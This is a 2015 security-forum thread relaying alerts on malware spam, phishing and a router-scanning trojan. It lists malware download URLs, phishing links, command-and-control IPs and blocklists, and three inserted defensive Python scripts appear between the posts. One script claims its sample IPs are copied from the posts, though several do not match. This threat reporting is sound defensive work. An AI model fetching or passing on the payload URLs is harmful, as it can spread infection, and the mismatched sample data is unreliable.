** https://www.virustotal.com/en/file/2660007dca7c1a19f5e0da9eceb1daa64e12c59f93251f9d79f9bb95087d9a57/analysis/1426156982/
... Behavioural information
TCP connections
95.163.121.33: https://www.virustotal.com/en/ip-address/95.163.121.33/information/
92.63.88.102: https://www.virustotal.com/en/ip-address/92.63.88.102/information/
- http://blog.dynamoo.com/2015/03/malware-spam-invoice-1234xyz-for.html
12 March 2015
"...Recommended blocklist:
95.163.121.0/24
92.63.82.0/23
92.63.84.0/22
92.63.88.0/24
85.143.166.0/24 "
___
Fake Voicemail SPAM - malware
- http://myonlinesecurity.co.uk/you-have-received-a-voice-mail-malware/
12 Mar 2015 - "'You have received a voice mail' pretending to come from Voicemail Report <no-reply@ voicemail-delivery .com> with a zip attachment is another one from the current bot runs...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/03/You-have-received-a-voice-mail.png
12 March 2015: VOICE8411-263-481.zip: Extracts to: VOICE8411-263-481.scr
Current Virus total detections: 5/57* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled”, will look like a proper sound file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/2328d042ec6293a85cf5beb00edd5cc0d8ff7dc5f426fe6f167e98cb87c8b376/analysis/1426165959/
___
Facebook Worm variant leverages Multiple Cloud Services
- https://blog.malwarebytes.org/fraud-scam/2015/03/new-facebook-worm-variant-leverages-multiple-cloud-services/
Mar 12, 2015 - "... We came across a worm that we think belongs to the -Kilim- family and whose purpose is to compromise a user and spread via Facebook. The lure is the promise of pornographic material that comes as what appears to be a video file named Videos_New.mp4_2942281629029.exe, which in reality is a malicious program. Once infected, the victim spreads the worm to all of his contacts and groups that he belongs to... The bad guys have built a multi-layer redirection architecture that uses the ow.ly URL shortener, Amazon Web Services and Box.com cloud storage.
> https://blog.malwarebytes.org/wp-content/uploads/2015/03/flow.png
... We identified three domains involved in the configuration and update mechanism for the worm:
- videomasars .healthcare | Enom, whoisguard Protected, Panama | 91.121.114.211 | PVH AS16276 OVH
- porschealacam .com | Enom, whoisguard Protected, Panama | 91.121.114.211 | PVH AS16276 OVH
- hahahahaa .com | Enom, whoisguard Protected, Panama |AS13335 CLOUDFLARENET
... This is a malicious file (Trojan) hosted on the popular cloud storage Box. Malwarebytes Anti-Malware detects it as Trojan.Agent.ED (VirusTotal link*). This binary is responsible for downloading additional resources (the worm component) from another resource (porschealacam .com). Here we find a malicious Chrome extension (VirusTotal link**) and additional binaries (scvhost.exe*** and son.exe****). Additional code is retrieved by the piece of malware (perhaps in case the user does not have the Chrome browser) from a third site, hahahahaa .com, to spread the worm via Facebook ... a rogue Chrome extension is injected but that is not all. The malware also creates a shortcut for Chrome that actually launches a malicious app in the browser directly to the Facebook website... In this ‘modified’ browser, attackers have full control to capture all user activity but also to restrict certain features. For example, they have disabled the extensions page that one can normally access by typing chrome://extensions/, possibly in an attempt to -not- let the user disable or remove the malicious extension. Clearly, the crooks behind this Facebook worm have gone to great lengths to anonymize themselves but also to go around browser protection by creating their own booby-trapped version.
We have reported the various URLs to their respective owners and some have already been shut down. However, we still urge caution before clicking on any link that promises free prizes or sensational items. Once again the bad guys are leveraging human nature and while we do not know how many people fell for this threat, we can guess that it most likely affected a significant number of Facebook users."
(More detail at the malwarebytes URL above.)
* https://www.virustotal.com/en/file/66973c39d0babe54392cea08c20438dbe70c15602ed9c25a644df6a1d17a06e2/analysis/1426093312/
** https://www.virustotal.com/en/file/70a299b0a62b6b1291aac4d01b238ec0e12203e445f936cf9126d6d6722232de/analysis/1426051972/
*** https://www.virustotal.com/en/file/6c2d98225ff41559947adcf2bc780616cf694d584a49dfed65a614a98fcf6d4c/analysis/1426093308/
**** https://www.virustotal.com/en/file/4373ef1d11f3c4711774a3891b221e6851bb227a89726c7d82e68b0f3a825ab7/analysis/1426093310/
91.121.114.211: https://www.virustotal.com/en/ip-address/91.121.114.211/information/
:fear: :mad:
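The posts above pair a "Recommended blocklist" (single IPs and CIDR ranges) with the "TCP connections" seen in the sandbox reports. The following is an added example, not code from any of the quoted blogs: it parses both list formats as they appear in the posts and reports which observed destinations fall inside a listed network, so an analyst can check sandbox output against a blocklist without eyeballing octets. The sample blocklist and connection lines are copied from the posts above; the regex and function names are my own.

```python
"""Cross-check observed C2 connections against a published blocklist.

Added example (not from the blog posts quoted above). It parses the
'Recommended blocklist' style entries (single IPs and CIDR ranges) and the
'TCP connections' style 'IP: <url>' lines, and maps each observed IP to the
blocklist network that contains it, if any.
"""
import ipaddress
import re

# Sample blocklist entries, in the format used in the posts (one IP or CIDR
# per line; a trailing closing quote as in the forum copy is tolerated).
BLOCKLIST_TEXT = """
31.41.45.211
62.213.67.115
95.163.121.0/24
92.63.88.0/24
188.120.243.159 "
"""

# Sample 'Behavioural information' lines as they appear in the posts.
OBSERVED_TEXT = """
TCP connections
95.163.121.33: https://www.virustotal.com/en/ip-address/95.163.121.33/information/
92.63.88.102: https://www.virustotal.com/en/ip-address/92.63.88.102/information/
216.146.39.70: https://www.virustotal.com/en/ip-address/216.146.39.70/information/
UDP communications
134.170.185.211: https://www.virustotal.com/en/ip-address/134.170.185.211/information/
"""

# Leading dotted quad with an optional /prefix; header lines do not match.
IP_RE = re.compile(r"^\s*(\d{1,3}(?:\.\d{1,3}){3}(?:/\d{1,2})?)")


def parse_blocklist(text):
    """Return ip_network objects; a bare IP becomes a /32 host network."""
    nets = []
    for line in text.splitlines():
        m = IP_RE.match(line)
        if m:
            nets.append(ipaddress.ip_network(m.group(1), strict=False))
    return nets


def parse_observed(text):
    """Extract the leading IP from 'IP: <url>' lines, skipping section headers."""
    ips = []
    for line in text.splitlines():
        m = IP_RE.match(line)
        if m and "/" not in m.group(1):
            ips.append(ipaddress.ip_address(m.group(1)))
    return ips


def match_blocklist(ips, nets):
    """Map each observed IP (as a string) to the first containing network, or None."""
    result = {}
    for ip in ips:
        result[str(ip)] = next((str(n) for n in nets if ip in n), None)
    return result


def blocked_count(blocklist_text, observed_text):
    """Number of observed destinations that a firewall using the blocklist would drop."""
    hits = match_blocklist(parse_observed(observed_text), parse_blocklist(blocklist_text))
    return sum(1 for net in hits.values() if net)


if __name__ == "__main__":
    nets = parse_blocklist(BLOCKLIST_TEXT)
    for ip, net in match_blocklist(parse_observed(OBSERVED_TEXT), nets).items():
        print(f"{ip:18} -> {net or 'not listed'}")
```

Only the two Dridex-related destinations land inside the listed ranges; the DNS and Microsoft-looking addresses that sandboxes routinely record are reported as "not listed", which is the distinction the posts draw when they say an IP is "in the same network neighbourhood".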
AplusWebMaster
2015-03-13, 15:40
FYI...
Malware targets home networks/router
- https://isc.sans.edu/diary.html?storyid=19463
2015-03-13 - "Malware researchers at Trend Micro* have analyzed a malware that connects to the home router, scans the home network, then sends the gathered information to C&C before deleting itself. TROJ_VICEPASS.A** pretends to be an Adobe Flash update; once it's run it will attempt to connect to the home router admin console using a predefined list of user names and passwords. If it succeeds, the malware will scan the network for connected devices. The malware scans for devices using HTTP, with a target IP range of 192.168.[0-6].0-192.168.[0-6].11 - this IP range is hard-coded. Once the scans finish it will encode the result using Base64 and encrypt it using a self-made encryption method. The encrypted result will be sent to a C&C server via HTTP protocol. After sending the results to the Command and Control server (C&C), it will delete itself from the victim’s computer... This type of malware infection can be avoided using very basic security techniques such as downloading updated software from trusted sources only and changing the default password."
* http://blog.trendmicro.com/trendlabs-security-intelligence/malware-snoops-through-your-home-network/
Mar 9, 2015 - "... We recently came across one malware, detected as TROJ_VICEPASS.A**, which pretends to be an Adobe Flash update. Once executed, it attempts to connect to the home router to search for connected devices. It then tries to log in to the devices to get information. Should it be successful, it will send the information to a command-and-control (C&C) server and deletes itself from the computer:
Infection chain:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2015/03/vicepass1.png
Users may encounter this malware when visiting suspicious or malicious sites hosting a supposed Flash update...
Site hosting fake Adobe Flash update:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2015/03/vicepass2.png
Fake Flash update:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2015/03/vicepass3.png
Once the malware is executed, it attempts to connect to the connected router through its admin console, using a predefined list of user names and passwords. If successful, the malware will attempt to scan the network to look for connected devices... The malware scans for devices using HTTP, with a target IP range of 192.168.[0-6].0-192.168.[0-6].11, which are IP addresses which are assigned by home routers. The target range is hard-coded. A look at the internal log format reveals such:
Find router IP address – start
Searching in 192.168.0.0 – 192.168.0.11
[0] connect to 192.168. 0.0
URL: ‘192.168.0.0’, METHOD: ‘1’, DEVICE: ‘Apple’
…. (skip)
Find router IP address – end
We noticed that the malware checks for Apple devices such as iPhones and iPads, even though those devices cannot have an HTTP open panel. However, it should be noted that the strings focus more on routers..."
(More detail at the trendmicro URLs, including the usernames and passwords tried.)
** http://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_vicepass.a
___
Fake Invoice SPAM - doc/xls malware
- http://myonlinesecurity.co.uk/penta-foods-invoice-2262004-word-doc-or-excel-xls-spreadsheet-malware/
13 Mar 2015 - "'Penta Foods Invoice: 2262004' pretending to come from cc446@ pentafoods .com with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... The email looks like:
Please find attached invoice : 2262004
Any queries please contact us.
—
Automated mail message produced by DbMail.
Registered to Penta Foods, License MBA2009357.
13 March 2015 : R-1179776.doc - Current Virus total detections: 0/56*
So far I am only seeing 1 version of this malware, but previous campaigns over the last few weeks have delivered 2 or 3 different versions, some with word doc attachments and some with Excel xls attachments... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/b4c6e800cd3d908ae316c6186ca7758d71400ad0c120814f844d3e4764b1e90a/analysis/1426236749/
- http://blog.dynamoo.com/2015/03/malware-spam-pentafoodscom-invoice.html
13 Mar 2015
"... Recommended blocklist:
62.76.179.44
212.69.172.187
78.129.153.12 "
___
More Fake Invoice SPAM - malware
- http://blog.dynamoo.com/2015/03/malware-spam-invoice-13032015-for.html
13 March 2015 - "There is a -series- of malware spams in progress in the following format:
Invoice (13\03\2015) for payment to JUPITER PRIMADONA GROWTH TRUST
Invoice (13\03\2015) for payment to CARD FACTORY PLC
Invoice (13\03\2015) for payment to CELTIC
Invoice (13\03\2015) for payment to MIRADA PLC
Note the use of the backslash in the date. There is an attachment in the format 1234XYZ.doc which I have seen three different variants of (although one of those was zero length), one of which was used in this spam run[1] yesterday and one new one with zero detections* which contains (a) malicious macro, which downloads another component from:
http ://95.163.121.186 /api/gbb1.exe
This is saved as %TEMP%\GHjkdfg.exe ... this server is wide open and is full of data and binaries relating to the Dridex campaign. Unsurprisingly, it is hosted on a Digital Networks CJSC aka DINETHOSTING IP address. This binary has a detection rate of 3/53** and the Malwr report shows it phoning home to 95.163.121.33 which is also in the same network neighbourhood. The binary also drops a malicious Dridex DLL with a detection rate of 5/56***. This is the same DLL as used in this spam run[2] earlier today.
Recommended blocklist:
95.163.121.0/24 "
* https://www.virustotal.com/en/file/475aa057202c98a0eab161e1d073390b34312565f98efb6c527c01791805523b/analysis/1426257108/
** https://www.virustotal.com/en/file/11b73915e64b4228f91fbb716bb3080252786df56d01bd6d0e7a4983375bfc1d/analysis/1426254512/
*** https://www.virustotal.com/en/file/2a79def8a3dc491729cecef3d9a5e8cb397126b1f84004dd6839321d4c60f7d0/analysis/1426257698/
1] http://blog.dynamoo.com/2015/03/malware-spam-invoice-1234xyz-for.html
2] http://blog.dynamoo.com/2015/03/malware-spam-pentafoodscom-invoice.html
95.163.121.186: https://www.virustotal.com/en/ip-address/95.163.121.186/information/
95.163.121.33: https://www.virustotal.com/en/ip-address/95.163.121.33/information/
___
Upatre update: infection chain and affected countries
- http://blogs.technet.com/b/mmpc/archive/2015/03/12/upatre-update-infection-chain-and-affected-countries.aspx
12 Mar 2015 - "... Detection rates for these countries is as follows:
> http://www.microsoft.com/security/portal/blog-images/a/UpatreTable.jpg "
:fear::fear: :mad:
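The ISC and Trend Micro write-ups above give one concrete, hard-coded fact about TROJ_VICEPASS.A: it probes 192.168.[0-6].0 through 192.168.[0-6].11 over HTTP. That is enough for a network-side detection. The following is an added example of my own, not code from either post: it reads constructed firewall-style log lines, counts the distinct in-range HTTP targets per source host, and flags hosts that sweep the range. The `src=... dst=... dport=...` log format and the threshold of 8 distinct targets are my assumptions, chosen so a user opening the router's admin page does not trip the rule.

```python
"""Flag a workstation sweeping the hard-coded TROJ_VICEPASS.A target range.

Added example, not from the ISC/Trend Micro posts quoted above. It relies on
the one fact those posts state (HTTP probes to 192.168.[0-6].0 - .11) and
assumes a simple 'src=... dst=... dport=...' log format of my own choosing.
"""
import ipaddress
import re
from collections import defaultdict

# The hard-coded range from the report: third octet 0-6, last octet 0-11.
SWEEP_RANGE = {
    ipaddress.ip_address(f"192.168.{k}.{h}") for k in range(7) for h in range(12)
}
HTTP_PORTS = {80, 8080}
THRESHOLD = 8  # distinct in-range targets before we call it a sweep (assumed value)

LOG_RE = re.compile(r"src=(\S+)\s+dst=(\S+)\s+dport=(\d+)")

# Constructed sample log: 192.168.0.25 behaves like the malware (walks .0-.11
# on two subnets); 192.168.0.30 is a normal user touching the router page.
SAMPLE_LOG = "\n".join(
    [f"2015-03-13T10:00:{i:02d} src=192.168.0.25 dst=192.168.0.{i} dport=80" for i in range(12)]
    + [f"2015-03-13T10:01:{i:02d} src=192.168.0.25 dst=192.168.1.{i} dport=80" for i in range(12)]
    + [
        "2015-03-13T10:02:00 src=192.168.0.30 dst=192.168.0.1 dport=80",    # router admin page
        "2015-03-13T10:02:05 src=192.168.0.30 dst=192.168.0.10 dport=445",  # SMB, not HTTP
        "2015-03-13T10:02:10 src=192.168.0.30 dst=93.184.216.34 dport=80",  # outbound web
        "2015-03-13T10:02:15 malformed line with no fields",
    ]
)


def in_range_http_targets(log_text):
    """Return {src: set(dst)} counting only HTTP connections into the sweep range."""
    targets = defaultdict(set)
    for line in log_text.splitlines():
        m = LOG_RE.search(line)
        if not m:
            continue  # ignore lines that do not carry the expected fields
        src, dst, dport = m.group(1), m.group(2), int(m.group(3))
        try:
            dst_ip = ipaddress.ip_address(dst)
        except ValueError:
            continue  # hostname or garbage in the dst field
        if dport in HTTP_PORTS and dst_ip in SWEEP_RANGE:
            targets[src].add(dst_ip)
    return targets


def detect_sweeps(log_text, threshold=THRESHOLD):
    """Sources that probed at least `threshold` distinct addresses in the range."""
    return sorted(
        src for src, dsts in in_range_http_targets(log_text).items() if len(dsts) >= threshold
    )


if __name__ == "__main__":
    for src in detect_sweeps(SAMPLE_LOG):
        print(f"possible VICEPASS-style sweep from {src}")
```

Because the range is fixed in the binary, the rule keys on destinations rather than on the Flash-update lure, so it also holds after the sample deletes itself from the infected machine, which the posts note it does once the results are sent.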
AplusWebMaster
2015-03-14, 22:32
FYI...
Quttera - false positives everywhere
- http://blog.dynamoo.com/2015/03/quttera-fails-and-spews-false-positives.html
14 Mar 2015 - "By chance, I found out that my blog had been blacklisted by Quttera[1]. No big deal, because it happens from time-to-time due to the nature of the content on the site. But I discovered that it isn't just my blog, but Quttera also blocks industry-leading sites such as Cisco*, VMWare, Sophos, MITRE, AVG and Phishtank...
* https://1.bp.blogspot.com/-6AZV_319Lzk/VQRq32vUhyI/AAAAAAAAGTo/d2J1zYeeLiQ/s1600/cisco-blacklist.png
... Now, you can ask Quttera to unblacklist your site for -free- by raising a ticket[2] but the most prominent link leads to a paid service for £60/year. Hmmm.
> https://4.bp.blogspot.com/-GI6AAyGmRv8/VQRri4mf-uI/AAAAAAAAGTw/FoO4vU0dSuY/s1600/quttera.png
I don't think that I will rush to subscribe to that. Obviously, something is seriously wrong with the algorithm in use, some of these sites should obviously be whitelisted. Quttera also doesn't understand the difference between a malicious domain or IP being mentioned and such a site being linked to or injected into a site. I guess there are many, many more domains that are in a similar situation. Perhaps you might want to check your own web properties and share your findings in the comments..."
1] http://www.quttera.com/
2] https://helpdesk.quttera.com/open.php
:fear::fear:
AplusWebMaster
2015-03-16, 15:31
FYI..
Fake Invoice SPAM - PDF malware
- http://myonlinesecurity.co.uk/credit-89371-james-kernohan-sons-malware/
16 Mar 2015 - "'CREDIT 89371' pretending to come from JamesKernohanandSons <jkernohans62244@ hotmail .com> with a zip attachment is supposed to be another one from the current bot runs...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/03/CREDIT-89371.png
... Update: ... the attached word doc is malicious... It connects to 212.143.213.133 /content/js/bin.exe (Virus Total*)... Further update: ... some copies of this email have the -same- malware attachment as Attached invoice from CMP – fake PDF malware**..."
* https://www.virustotal.com/en/file/1227f0530f3b1cde2d62e9b5ee17825c88edb3617df456a490878a20a5a605b5/analysis/1426502722/
212.143.213.133: https://www.virustotal.com/en/ip-address/212.143.213.133/information/
** http://myonlinesecurity.co.uk/attached-invoice-from-cmp-fake-pdf-malware/
16 Mar 2015 - "'Attached invoice from CMP' pretending to come from noreply@ cmpireland .com with a zip attachment is another one from the current bot runs...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/03/Attached-invoice-from-CMP.png
16 March 2015: ICI151586.PDF.ZIP: Extracts to: INVOICE_89371.PDF.exe - Current Virus total detections: 9/57*
Update: Also getting word doc attachments - ICI151586.DOC - Current Virus total detections: 2/57**
(... same malware payload as CREDIT 89371 James Kernohan & Sons – malware... Confirmed as -same- payload although from a different download location 03740b7.netsolhost .com/js/bin.exe which is saved as %temp%\lUtsca32.exe (virus total***) . This is another one of the spoofed icon files that unless you have “show known file extensions enabled”, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/8191ea044f87d916804034ae5171da678406eaff079a89f895050efae3913d2f/analysis/1426499520/
** https://www.virustotal.com/en/file/db3e6308564335022e38de73bdf6357e9879a0cc6af05d8aac33e7cc62b6a96a/analysis/1426502121/
*** https://www.virustotal.com/en/file/1227f0530f3b1cde2d62e9b5ee17825c88edb3617df456a490878a20a5a605b5/analysis/1426503751/
208.91.197.128: https://www.virustotal.com/en/ip-address/208.91.197.128/information/
___
Fake 'Receipt' SPAM - PDF malware
- http://myonlinesecurity.co.uk/successful-receipt-of-online-submission-for-reference-5071910-fake-pdf-malware/
16 Mar 2015 - "'Successful Receipt of Online Submission for Reference 5071910' [random reference numbers] pretending to come from noreply@ hmrc .gov .uk with a zip attachment is another one from the current bot runs...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/03/Successful-Receipt-of-Online-Submission-for-Reference-5071910.png
16 March 2015: Ref_5071910.zip: Extracts to: Ref_AN004LO87.scr
Current Virus total detections: 6/56* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled”, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/ca6088c53e1d33fa733b85d330a1cc3f84c474b881cc81613ade14e8615339ae/analysis/1426509399/
___
Fake 'Outstanding Invoices' SPAM - doc malware
- http://myonlinesecurity.co.uk/outstanding-invoices-word-doc-or-excel-xls-spreadsheet-malware/
16 Mar 2015 - "'Outstanding invoices – 672751 February' pretending to come from random names and email addresses with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... The email looks like:
Dear Sirs,
Kindly find attached our reminder and copy of the relevant invoices.
Looking forward to receive your prompt payment and thank you in advance.
Kind regards
Tania Sosa
16 March 2015 : 672751.doc - Current Virus total detections: 0/56*
... previous campaigns over the last few weeks have delivered 2 or 3 different versions, some with word doc attachments and some with Excel xls attachments... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/f161b30d5b183121e0bb2511efbfd08d11851d1bc693c1014a4f75b5c1640c9f/analysis/1426514043/
:fear: :mad:
AplusWebMaster
2015-03-17, 15:57
FYI...
Fake Invoice SPAM - doc/xls malware
- http://myonlinesecurity.co.uk/invoice-from-linsen-parts-ltd-word-doc-or-excel-xls-spreadsheet-malware/
17 Mar 2015 - "'Invoice from Linsen Parts Ltd' pretending to come from Linsen Parts UK Ltd <mark62618@ linsenparts .co.uk> ( random numbers after mark) with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/03/Invoice-from-Linsen-Parts-Ltd.png
17 March 2015 : Invoice-3709.doc Current Virus total detections: 2/57* | 2/57** | 2/57*** which downloads from piotrkochanski .cba.pl/js/bin.exe (and other locations) and is a dridex banking Trojan (VirusTotal)[4].
I am seeing 3 versions of this malware, but previous campaigns over the last few weeks have delivered 3, 4 or even more different versions, some with word doc attachments and some with Excel xls attachments... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/84ed4af68f401bdf7f5470fbb4a49134a523a032919baf8610510d5e34b03268/analysis/1426579380/
** https://www.virustotal.com/en/file/24aff09953c8301e82217137001b9ed45a84a3f3a04d6ce1a875d2d36eb275fb/analysis/1426579237/
*** https://www.virustotal.com/en/file/90767466ea908631bdba5f8628c7a02aa3ceb900e0a70cd2d18c4f86f58222e7/analysis/1426580404/
4] https://www.virustotal.com/en/file/261c9cb9041becb540dea94b3eb809867a3f0296a25c24a8d300216c1cc29f7b/analysis/1426578803/
... Behavioural information
TCP connections
78.129.153.12: https://www.virustotal.com/en/ip-address/78.129.153.12/information/
UDP communications
134.170.185.211: https://www.virustotal.com/en/ip-address/134.170.185.211/information/
___
Fake 'Payment confirmation' SPAM - doc / xls malware
- http://myonlinesecurity.co.uk/payment-confirmation-abl104-word-doc-or-excel-xls-spreadsheet-malware/
17 Mar 2015 - "'Payment confirmation ABL104' ( random numbers) coming from random names and email addresses with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... Other subjects in today’s spam run with malicious word macro docs are:
Transaction confirmation ZLZ240 ( random numbers)
Confirmation for payment NZV088 ( random numbers)
RE:Confirmation for payment OXP504 ( random numbers)
RE:Transaction confirmation YVD711
This email has what appears to be a genuine word doc or Excel XLS spreadsheet attached which is malformed and contains a macro script virus...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/03/Payment-confirmation.png
17 March 2015 : ABL104.doc - Current Virus total detections: 2/55*
... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/8709c28b6aab2a7f279f3f6ed1b809523b91939d90281b41bfd5ef24c2545f62/analysis/1426590334/
___
Fake 'Admin Exchange' SPAM – PDF malware
- http://myonlinesecurity.co.uk/administrator-exchange-email-fake-pdf-malware/
17 Mar 2015 - "'Administrator – Exchange Email' pretending to come from you and your domain Administrator@ ron .schorr ... with a zip attachment is another one from the current bot runs... The email pretends to come from the person it is addressed to and from your own email domain so looks like:
ron.schorr,
This attachment provides you with managing facilities for your mailboxes, public folders, distribution lists, contact and mail service general settings. Please save the attached file to your hard drive before deleting this message.
Thank you,
Administrator ...
17 March 2015: Exchange.zip: Extracts to: Exchange.scr - Current Virus total detections: 5/52*
This is another one of the spoofed icon files that unless you have “show known file extensions enabled”, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/9e5664bac44970cfb8d73915df834d14d5eef369d51db6543ba9d68e6135d7a2/analysis/1426607993/
... Behavioural information
TCP connections
216.146.43.70: https://www.virustotal.com/en/ip-address/216.146.43.70/information/
109.230.131.95: https://www.virustotal.com/en/ip-address/109.230.131.95/information/
213.186.33.82: https://www.virustotal.com/en/ip-address/213.186.33.82/information/
UDP communications
77.72.174.167: https://www.virustotal.com/en/ip-address/77.72.174.167/information/
77.72.174.166: https://www.virustotal.com/en/ip-address/77.72.174.166/information/
___
Fake Wells Fargo SPAM - PDF malware
- http://myonlinesecurity.co.uk/wells-fargo-fw-customer-account-docs-fake-pdf-malware/
17 Mar 2015 - "'FW: Customer account docs' pretending to come from Carrie L. Tolstedt <Carrie.Tolstedt@ wellsfargo .com> with link to a zip attachment is another one from the current bot runs...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/03/Customer-account-docs.png
17 March 2015: SignedDocuments.zip: Extracts to: SignedDocuments.scr
Current Virus total detections: 3/56* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled”, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/157158f46dc0a72c703f48d337b6f1ccd128e3f3c85ff955c435cf12f296f5a8/analysis/1426610474/
... Behavioural information
TCP connections
216.146.43.70: https://www.virustotal.com/en/ip-address/216.146.43.70/information/
109.230.131.95: https://www.virustotal.com/en/ip-address/109.230.131.95/information/
198.23.48.157: https://www.virustotal.com/en/ip-address/198.23.48.157/information/
UDP communications
134.170.185.211: https://www.virustotal.com/en/ip-address/134.170.185.211/information/
77.72.169.165: https://www.virustotal.com/en/ip-address/77.72.169.165/information/
77.72.169.164: https://www.virustotal.com/en/ip-address/77.72.169.164/information/
:fear: :mad:
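Several posts above repeat the same point: a ZIP attachment extracts to an .scr or .exe (Exchange.zip -> Exchange.scr, SignedDocuments.zip -> SignedDocuments.scr, or earlier ICI151586.PDF.ZIP -> INVOICE_89371.PDF.exe) whose spoofed icon passes for a PDF or sound file once Windows hides known extensions. The following is an added example, not code from myonlinesecurity.co.uk or dynamoo: a mail-gateway style check that opens the archive, looks at the real trailing extension of every member, and calls out the ".PDF.exe" double-extension trick explicitly. The extension sets, verdict names and the in-memory sample archive (harmless placeholder bytes, not the real samples) are my own construction.

```python
"""Flag ZIP e-mail attachments whose members are executables dressed up as documents.

Added example, not from the posts quoted above. It reproduces, at the gateway,
what 'show known file extensions' would let the user see on the desktop.
"""
import io
import zipfile

# Extensions Windows will execute when double-clicked (assumed list, not from the posts).
EXEC_EXT = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".js", ".jse",
            ".vbs", ".vbe", ".wsf", ".hta"}
# Document-like extensions used as the decoy half of a double extension.
DECOY_EXT = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".wav", ".mp3", ".txt", ".jpg"}
# Office formats that the posts say carry macro droppers: pass to a macro scanner.
MACRO_EXT = {".doc", ".docm", ".xls", ".xlsm", ".rtf"}


def inspect_member(name):
    """Return (verdict, reason) for one archive member name.

    verdict is 'block', 'review' or 'allow'.
    """
    base = name.rsplit("/", 1)[-1].lower()  # zipfile always uses forward slashes
    parts = base.split(".")
    exts = ["." + p for p in parts[1:]] if len(parts) > 1 else []
    last = exts[-1] if exts else ""
    if last in EXEC_EXT:
        if len(exts) >= 2 and exts[-2] in DECOY_EXT:
            return ("block", f"executable with spoofing double extension {exts[-2]}{last}")
        return ("block", f"executable {last}")
    if last in MACRO_EXT:
        return ("review", f"Office document {last}; scan for macros")
    return ("allow", "no executable extension")


def inspect_zip(data):
    """Map every member of a ZIP (given as bytes) to its (verdict, reason)."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return {info.filename: inspect_member(info.filename) for info in zf.infolist()}


def should_block(data):
    """True if any member of the archive is an executable."""
    return any(verdict == "block" for verdict, _ in inspect_zip(data).values())


def build_sample_zip():
    """Constructed stand-in for the attachments described above (placeholder bytes, no malware)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Exchange.scr", b"MZ-placeholder")
        zf.writestr("INVOICE_89371.PDF.exe", b"MZ-placeholder")
        zf.writestr("Invoice-3709.doc", b"doc-placeholder")
        zf.writestr("readme.txt", b"hello")
    return buf.getvalue()


if __name__ == "__main__":
    sample = build_sample_zip()
    for member, (verdict, reason) in inspect_zip(sample).items():
        print(f"{verdict:6} {member:24} {reason}")
    print("block attachment:", should_block(sample))
```

The check deliberately keys on the member name rather than on the archive name: ICI151586.PDF.ZIP looks no different from any other ZIP until it is opened, and the posts' "Extracts to:" lines are exactly the information this function recovers.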
AplusWebMaster
2015-03-18, 13:27
FYI...
HMRC Tax Refund - Phish ...
- http://myonlinesecurity.co.uk/hmrc-tax-refund-notification-phishing/
18 Mar 2015 - "'Tax Refund Notification' is an email pretending to come from HM Revenue & Customs. One of the major common subjects in a phishing attempt is Tax returns, where especially in UK, you need to submit your Tax Return online before 31st December each year. This one wants your personal details and your credit card and bank details. Many of them are also designed to specifically steal your email, facebook and other social network log in details... The original email looks like this, and of course at this time of year (or anytime of year) we all need a few extra pennies and the offer of a tax refund is always welcome. It will NEVER be a genuine email from HMRC so don’t ever fill in the html ( webpage) form that comes attached to the email. Some versions of this phish will have a link to a website that looks at first glance like the genuine HMRC website. That is also false. This particular email has the entire content in an image and clicking anywhere on the image leads you to http ://taxrefundid778318ok.uleconstruction .com/ which in turn sends you on to http ://refund-hmrc.uk-6159368de39251d7a-login.id-107sbtd9cbhsbtd5d80a13c0db1f546757jnq9j5754675752240566.isteksut .com/IlOyTgNjFrGtHtEwVo/indexx.php
Both urls could easily be mistaken for genuine tax refund sites when you don’t take care and only look at the first part of the url & not the entire url... If you follow the link you see a webpage looking like this where they want your email address, name and date of birth.
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/spiderspun_HMRC_phish1.png
They then pretend to do a search based on your name and email. Then you get sent on to the nitty gritty where they want all your banking and credit information. This obviously was created by a non UK person because the UK uses post codes & not zip codes, which should be an immediate alarm bell to somebody getting this far:
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/03/fake-HMRC-tax-refund.png
All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email..."
___
Fake 'Confirmation' SPAM – doc / xls malware
- http://myonlinesecurity.co.uk/nwn-media-ltd-confirmation-of-booking-word-doc-or-excel-xls-spreadsheet-malware/
18 Mar 2015 - "'NWN Media Ltd Confirmation of Booking' pretending to come from della.richards4732@ nwn. co.uk <della.richards@ nwn. co.uk> with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs...
